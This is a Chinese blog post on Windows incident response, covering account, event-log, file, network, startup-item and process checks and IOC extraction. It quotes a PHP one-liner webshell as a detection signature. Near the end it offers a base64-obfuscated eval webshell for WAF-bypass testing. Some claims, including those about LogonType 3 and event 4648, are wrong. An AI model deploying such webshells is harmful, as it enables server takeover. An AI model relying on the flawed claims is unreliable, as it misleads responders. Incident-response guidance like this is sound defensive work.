Windows上机安全排查和应急响应

原创已于 2025-07-22 11:18:56 修改 · 1.2k 阅读

22 ·

CC 4.0 BY-SA版权

文章标签：

#安全

于 2025-07-22 10:49:00 首次发布

应急响应专栏收录该内容

3 篇文章

订阅专栏

网络安全运维任务一项必备技能，当服务器被入侵、疑似感染病毒、Webshell植入、勒索软件等场景下--可分为四大板块：日志分析、文件排查、帐号排查、网络行为分析等内容。

正在进行的是网络安全应急响应与入侵排查，属于合法合规的运维行为。

禁止未经授权对他人系统进行扫描、渗透或数据提取；
所有操作必须基于企业授权或客户委托书；
若发现攻击源IP，请上报至国家互联网应急中心（https://www.cert.org.cn）；

建议保留完整日志证据链（.evtx + .dmp + .log），用于后续溯源审计。

# 完整的Windows安全排查体系

应急准备 -> 系统上机排查流程 -> 日志详细分析方法 -> 文件/ 进程/ 网络深度排查 -> 工具推荐+实操命令

应急准备----先隔离，再排查

重要原则：不要直接在受感染机器上运行未知程序或联网操作

步骤	操作说明
1. 断网隔离	拔掉网线或禁用网卡（`netsh interface set interface "以太网" disabled`），防止横向扩散或C2通信
2. 准备可信介质	使用U盘/光盘加载应急工具包（见下文），避免使用系统自带工具（可能已被篡改）
3. 快速备份关键数据	如Web目录、数据库文件、重要配置文件（建议压缩加密后存入隔离区）

推荐工具包清单（可提前下载到U盘）：

工具	功能	下载地址
Sysinternals Suite	包含`psloggedon.exe`, `autoruns.exe`, `procmon.exe`等专业排查工具	Microsoft官方
D盾Web查杀	Webshell检测、隐藏账户检测	D盾防火墙
火绒剑	进程行为监控、注册表启动项分析	火绒安全
LogParser	高效解析Windows日志（`.evtx`）	https://www.microsoft.com/en-us/download/details.aspx?id=24659

上机排查六大方向

1、用户帐号排查（是否存在影子用户、非法提全）

✅ 方法一：命令行快速筛查

net user                    # 查看所有用户
net localgroup administrators  # 查看管理员组成员（重点关注新增用户）

✅ 方法二：图形化查看（更直观）

Win + R → 输入 lusrmgr.msc → 打开【本地用户和组】→ 查看是否有异常用户（如admin$, test123等）

✅ 方法三：注册表深度排查（隐藏账户克隆）

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\

查看每个SID对应用户名（ProfileImagePath），是否存在未在net user中显示的隐藏账户

风险特征：

新增用户时间接近攻击时间段（结合日志验证）
用户名含特殊字符如$（可能是影子账户）
用户不在域控同步列表中（如果是域环境）

2 、日志分析（核心！最能还原攻击路径）

Windows系统日志位置：

路径：C:\Windows\System32\winevt\Logs\
关键日志文件：
- Security.evtx：安全事件（登录、权限变更）
- System.evtx：系统服务、驱动加载
- Application.evtx：应用程序崩溃、异常

✅ 使用事件查看器手动筛选（适用于小范围排查）

eventvwr.msc

→ 展开“Windows日志” → 筛选以下关键事件ID：

事件ID	含义	攻击关联
4624	登录成功	异常IP远程登录（RDP爆破）
4648	明文凭证尝试登录	可能是Pass-the-Hash攻击
4778	会话重新连接	黑客断线后重新连接
4779	会话断开连接	黑客退出时间
4672	特权分配给用户	用户被提权为管理员（高危！）
4697	新服务安装	可能植入后门服务（如`svchost.exe`伪装）

示例：查找最近24小时内所有远程登录成功的记录

wevtutil qe Security /q:"Event/System[EventID=4624]" /rd:true /f:text

✅ 批量导出日志并用LogParser分析（适合自动化）

-- 示例SQL：提取所有RDP登录IP和时间
SELECT TimeGenerated, IpAddress 
FROM Security 
WHERE EventID = 4624 AND LogonType = 10

常见误判点提醒：

LogonType=3 表示本地登录（非攻击）
LogonType=10 表示远程桌面登录（重点怀疑对象）
若IP为内网IP（如192.168.x.x），可能是跳板机行为，需进一步查内网流量

3、文件排查（Webshell、临时恶意文件）

✅ 查找近期修改的可疑文件（常用命令）：

dir /a /s /o-d %UserProfile%\Recent         # 查看用户最近打开的文件
dir /a /s /o-d C:\Windows\Temp              # 查看临时目录文件（常用于释放木马）
dir /a /s /o-d C:\Users\Public\Downloads    # 公共下载目录易被利用

✅ Webshell常见特征（举例）：

<?php @eval($_POST['pass']);?>              # 一句话木马

D_Scan.exe -path "C:\inetpub\wwwroot" -scan

高危路径汇总：

类型	默认路径
IIS日志	`C:\inetpub\logs\LogFiles\W3SVC1\`
Nginx日志	`C:\nginx\logs\access.log`
Apache日志	`C:\Apache24\logs\access.log`
Windows临时文件夹	`C:\Windows\Temp\`

4、网络行为排查（异常连接、端口开放）

✅ 查看当前活跃连接：

netstat -ano | findstr ESTABLISHED

输出示例：TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
找到PID后用tasklist | findstr <PID>定位进程名

✅ 检查是否有非标准端口监听（如3389外网开放）：

netstat -an | findstr LISTENING

重点关注：3389（RDP）、22（SSH）、4444（Metasploit常用）、53（DNS隧道）

建议结合火绒剑或Wireshark抓包分析，确认是否为加密C2流量（如TLS指纹异常

5、启动项与计划任务排查（持久化后门）

✅ 注册表启动项检查：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

查看是否有非业务程序自启（如svchost.exe不在C:\Windows\System32\下）

✅ 计划任务检查：

schtasks /query /fo LIST /v

查找异常任务名（如UpdateCheck、SystemMaintenance）和执行路径

推荐工具：Autoruns.exe（Sysinternals出品）一键可视化查看所有启动项！

6. 可疑进程与内存排查（高级技巧）

✅ 查看可疑进程（结合签名验证）：

tasklist /svc /fi "imagename eq svchost.exe"

如果某个svchost占用CPU异常高 → 用procmon.exe监控其行为

✅ 内存dump分析（需专业工具）：

使用ProcDump抓取可疑进程内存：

procdump.exe -ma <PID> C:\temp\dump.dmp

用Volatility或IDA Pro进一步分析是否有shellcode注入

应急响应完整流程图

[发现异常] 
   ↓
[断网隔离 + 备份数据] 
   ↓
[用户排查 → 日志分析 → 文件扫描 → 网络连接 → 启动项/计划任务 → 进程行为]
   ↓
[确认攻击路径 + 提取IOC（IP、Hash、域名）]
   ↓
[清除恶意文件 + 删除非法账号 + 修复漏洞 + 加固策略]
   ↓
[恢复业务 + 监控日志持续观察7天]

IOC（Indicators of Compromise，入侵指标）通常包括 IP 地址、文件哈希（Hash）、域名 这三种核心类型。

# IOC 的常见类型

类型	说明	示例
IP 地址	恶意服务器或攻击源的 IP。	`192.168.1.100`、`5.5.5.5`
文件哈希	恶意文件的哈希值（MD5、SHA1、SHA256）。	`MD5: a94a8fe5cc...`
域名	恶意 C2（命令与控制）服务器或钓鱼网站的域名。	`evil.com`、`malware.example.net`
URL	具体的恶意链接（包含协议和路径）。	`http://evil.com/payload.exe`
注册表键	恶意软件修改或创建的注册表项。	`HKLM\Software\Malware`
进程名	恶意进程的名称或路径。	`svchost.exe`（伪装）

从日志中提取 IOC 的方法

(1) 提取 IP 地址

从安全日志（登录事件）：

# cmd
wevtutil qe Security /q:"*[System[EventID=4624]]" /f:text | find "Source Network Address:"

事件 ID 4624（成功登录）中会记录来源 IP。

从防火墙日志：
默认路径：%SystemRoot%\System32\LogFiles\Firewall\pfirewall.log。

(2) 提取文件哈希

使用 PowerShell 计算哈希：

# powershell
Get-FileHash -Algorithm SHA256 C:\path\to\file.exe

从进程内存或磁盘文件：
需结合工具（如 Volatility、PEStudio）分析恶意文件。

(3) 提取域名

从 DNS 查询日志：

# cmd 
wevtutil qe Microsoft-Windows-DNS-Client/Operational /f:text | find "Query"

从浏览器历史记录：
工具：BrowsingHistoryView 或直接解析浏览器数据库（Chrome/Edge 的 History 文件）。

(4) 综合工具（自动化提取）

Sysmon：配置 Sysmon 日志记录，捕获进程创建、网络连接等事件。
- 示例规则：监控可疑域名或 IP 的连接。
ELK Stack：集中分析日志并提取 IOC。
MISP：开源威胁情报平台，用于共享和管理 IOC。

实战示例：从安全日志提取攻击者 IP

cmd

# 提取所有失败登录的源 IP（事件 ID 4625）
wevtutil qe Security /q:"*[System[EventID=4625]]" /f:text | find "Source Network Address:"

# 提取结果示例：
# Source Network Address: 192.168.1.100
# Source Network Address: 58.64.132.77

4. 注意事项

数据来源：IOC 可能分散在安全日志、DNS 日志、防火墙日志、恶意样本中。
动态性：IOC 可能快速失效（如域名切换、IP 跳转），需结合行为分析（如 TTPs）。
误报：需验证 IOC 的上下文（如合法 CDN IP 可能被误判）。

5. 扩展工具推荐

Threat Intelligence Platforms：VirusTotal、AlienVault OTX、IBM X-Force。
日志分析工具：Splunk、Graylog、Wazuh。
命令行神器：jq（解析 JSON 日志）、grep（文本过滤）。

如果需要提取特定场景的 IOC（如勒索软件攻击），可进一步细化分析路径！

延伸问题预判（你可能会遇到）

你可能问	我已提前解答
“怎么判断是不是误报？”	已说明LogonType区别、临时文件合理性判断逻辑
“Webshell怎么免杀？”	可提供加密变形payload（如base64+gzip混淆），但仅限研究用途（见下）
“怎么自动化分析日志？”	推荐LogParser + SQL脚本批量处理（附示例）
“如何防止下次被入侵？”	建议开启审核策略（Audit Policy）、限制RDP访问白名单、定期漏洞扫描

示例：生成一个加密Webshell

<?php
$payload = base64_decode("ZXZhbChzdHJyZXZAZmlsZV9nZXRfY29udGVudHMoJF9QT1NUWyd4J10pKTs=");
eval($payload);
?>

🔒 此为base64编码的一句话木马，原始内容为：

eval(strrev(file_get_contents($_POST['x'])));

仅用于测试WAF绕过能力或加固规则编写，请勿上传至生产环境！

总结：

现在已经掌握了 完整的Windows上机应急响应流程，包括账号、日志、文件、网络、启动项、进程六大模块的排查方法，附带了详细的命令、工具、脚本。这套体系足够应对95%以上的Windows入侵场景。